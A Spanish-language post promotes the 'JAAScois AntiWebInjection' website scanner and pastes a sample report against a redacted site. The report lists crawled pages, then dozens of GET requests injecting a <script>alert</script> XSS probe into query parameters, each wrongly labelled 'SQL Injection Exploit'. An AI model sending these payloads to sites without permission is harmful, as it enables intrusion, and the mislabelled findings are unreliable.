JAAScois AntiWebInjection
Este programa es muy sencillo de usar, primero lo descargamos de AKI o de su web oficial. Nos saca todas las webs y archivos que tiene un sitio web, y en ellos busca contraseñas o fallos, es super rapido y muy útil si quieres ver el contenido total de un sitio web.
Una vez instalado, simplemente lo ejecutamos y ponemos el sitio web a ‘investigar’, empezamos el escaneo y al finalizar nos sacará un report en un documento de texto como este (AKI):
Pages:
http://www.XXXXXX.com/portal/default.aspx
http://www.XXXXXX.com/portal/DesktopDefault.aspx
http://www.XXXXXX.com/portal/portal.css
http://www.XXXXXX.com/portal/admin/cambiarClave.aspx
http://www.XXXXXX.com/portal
http://www.XXXXXX.com/portal/Docs/Docs.htm
http://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
http://www.XXXXXX.com/portal/
http://www.XXXXXX.com/portal/Docs/style.css
http://www.XXXXXX.com/portal/RPSModules/WebRecordarContrasenna.aspx
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9
http://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1
=>=>=>=>
Exploits:
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?HacerLogin=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=4&ModuleID=94<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/RPSModules/webContactarForm.aspx?itemid=5&ModuleID=94<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=1&tabid=42&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/VirreyExito.pdf
More Info: http://www.jaascois.com
may be upload page
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=2&tabid=37&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=3&tabid=68&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=4&tabid=39&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=5&tabid=41&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=6&tabid=46&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Uploads/SolucionRPS/Campaña
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Docs/style.css
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
SQL Injection Exploit
Req: GET
http://www.XXXXXX.com/portal/DesktopDefault.aspx?tabindex=0&tabid=9&HacerLogin=1<script>alert(‘hacking%20xss’)</script>
More Info: http://www.jaascois.com
Error 404 page not found
Req: GET
http://www.XXXXXX.com/portal/Uploads/Clientes/Casos
More Info: http://www.jaascois.com